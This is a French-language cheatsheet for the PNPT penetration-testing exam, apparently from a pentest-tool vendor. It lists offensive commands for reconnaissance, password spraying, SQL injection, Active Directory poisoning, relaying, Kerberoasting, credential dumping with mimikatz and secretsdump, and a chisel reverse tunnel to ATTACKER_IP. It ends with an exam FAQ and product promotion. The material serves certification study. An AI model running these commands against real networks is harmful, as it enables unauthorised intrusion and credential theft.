# OSINT & Recon externe
Le PNPT commence là où commence une vraie mission : la reconnaissance externe. Énumère les employés, emails et services exposés pour construire ton foothold initial.
theHarvester -d TARGET.com -b all
subfinder -d TARGET.com -silent | httpx -silent -title -tech-detect
curl -s 'https://crt.sh/?q=%.TARGET.com&output=json' | jq -r '.[].name_value' | sort -u
nmap -p- --min-rate=1000 -T4 TARGET -oN ext_ports.txt
# Accès externe
Transforme l'OSINT en foothold : password spraying sur les portails exposés, exploitation web et réutilisation de credentials.
netexec smb TARGET -u users.txt -p 'Saison2026!' --continue-on-success
ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc all -fc 404
sqlmap -r request.txt --batch --level 5 --risk 3 --dbs
# Active Directory
Une fois à l'intérieur, l'Active Directory est le cœur du PNPT. Empoisonne, relaie, roast, et bouge latéralement jusqu'au Domain Admin.
responder -I eth0 -dwv
impacket-ntlmrelayx -tf targets.txt -smb2support
bloodhound-python -d domain.local -u USER -p PASS -c All -ns DC_IP
impacket-GetUserSPNs domain.local/USER:PASS -dc-ip DC_IP -request
impacket-secretsdump domain.local/ADMIN:PASS@DC_IP
evil-winrm -i TARGET -u USER -H NTLM_HASH
# Pivoting & Tunneling
Le PNPT va de l'externe vers l'interne. Pivote depuis ton foothold externe vers le LAN de l'entreprise.
./proxy -selfcert # ligolo-ng sur Kali, puis ajoute la route du tunnel
./chisel server -p 8080 --reverse # client : ./chisel client ATTACKER_IP:8080 R:socks
proxychains4 netexec smb 10.10.0.0/24
# Post-Exploitation
Récupère des credentials, dump les secrets et démontre l'impact une fois les hôtes possédés.
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
whoami /priv # cherche SeImpersonate → GodPotato pour SYSTEM
netexec smb 10.10.0.0/24 -u ADMIN -H NTLM_HASH --shares
# Rapport & Debrief
Le PNPT ne s'arrête pas au Domain Admin. Tu dois livrer un rapport professionnel ET le défendre lors d'un debrief oral de 15 minutes.
# Résumé exécutif → Narratif d'attaque (chemin vers DA) → Synthèse compromission AD → Findings → Recommandations
# Prépa debrief : schéma du chemin d'attaque + 1 phrase « pourquoi » par étape + remédiation
# Conseils Examen PNPT
Stratégie pour les 5 jours d'examen, le rapport, et le debrief oral.
❓ Questions fréquentes PNPT
Le PNPT de TCM Security est un examen pratique de 5 jours sur un réseau Active Directory réaliste, suivi de 2 jours pour rédiger un rapport professionnel, et d'un debrief oral obligatoire de 15 minutes où tu présentes tes résultats à un examinateur TCM. Il faut compromettre le domaine ET défendre ta méthodologie.
Le debrief est un appel vidéo en direct de 15 minutes avec un examinateur TCM après la remise de ton rapport. Tu déroules ton chemin d'attaque et réponds aux questions. Il teste la compréhension, pas seulement l'exécution — tu dois expliquer POURQUOI chaque étape a fonctionné.
Le PNPT est souvent vu comme plus accessible et réaliste : forte composante externe-vers-interne et OSINT, gros focus Active Directory, pas de buffer overflow, et un debrief oral. L'OSCP a des machines indépendantes et une fenêtre plus courte de 23h45. Les deux sont respectés ; le PNPT met l'accent sur un vrai workflow de mission.
theHarvester et les outils OSINT, nmap, Responder et ntlmrelayx, BloodHound, impacket (GetUserSPNs, secretsdump, psexec), NetExec/CrackMapExec, evil-winrm, mimikatz, et ligolo-ng ou chisel pour le pivoting. Le rapport se rédige comme une vraie mission client.
Oui — c'est le cœur de l'examen. Après le foothold externe, tu pivotes en interne et attaques l'AD : empoisonnement LLMNR/NBT-NS (Responder), relais NTLM, Kerberoasting, pass-the-hash, token impersonation et mouvement latéral jusqu'au Domain Admin.
Très importante. Contrairement à la plupart des examens, le PNPT commence par une phase OSINT externe — énumération des employés, emails et services exposés pour construire un foothold (par exemple un password spray sur un portail exposé). L'OSINT alimente directement l'accès initial.
Non. Le PNPT n'inclut pas d'exploitation manuelle de buffer overflow. Il se concentre sur l'OSINT, l'accès externe, l'Active Directory, le pivoting et le reporting — un workflow de test d'intrusion réseau interne réaliste.
Oui. Le voucher PNPT inclut un retake gratuit, et le modèle de TCM Security est pensé pour être accessible. Vérifie la politique actuelle de TCM Security pour les détails exacts avant de programmer.
Un rapport professionnel type client : résumé exécutif, périmètre, narratif d'attaque (chemin vers Domain Admin), findings techniques avec sévérité et remédiation, et recommandations stratégiques. Il doit être assez clair pour être présenté en direct pendant le debrief de 15 minutes.
Oui — comme accélérateur de préparation. La mindmap gratuite organise 12 020+ commandes couvrant les domaines PNPT (OSINT, AD, pivoting), l'Espace Pentest inclut un template de rapport PNPT dédié avec une synthèse de compromission AD, et l'AI Wizard génère un rapport style PNPT. Respecte toujours les règles de ton examen.
📚 Ressources liées
- Cheatsheet Active Directory — De Responder au Domain Admin — le cœur de la phase interne du PNPT
- Cheatsheet CPTS — L'équivalent pentest d'entreprise de HTB
- Cheatsheet OSCP — L'équivalent OffSec — 150+ commandes d'examen
- Cheatsheet Nmap — Référence nmap complète pour le scan externe et interne
- Guide du rapport de pentest — Structure et template d'un rapport à défendre en debrief
- Cheatsheet Pentesting complète — 200+ commandes pour web, réseau, Active Directory et privesc
Transforme tes findings en rapport PNPT avec une synthèse de compromission AD — l'AI Wizard a un format PNPT dédié prêt pour ton debrief.
Prépare ton PNPT avec 12 020+ commandes
Cette cheatsheet n'est que la surface. Pentest Mindmap organise 12 020+ commandes en 34 catégories avec recherche instantanée, un template de rapport PNPT et un générateur de rapport IA.
Commencer gratuitement →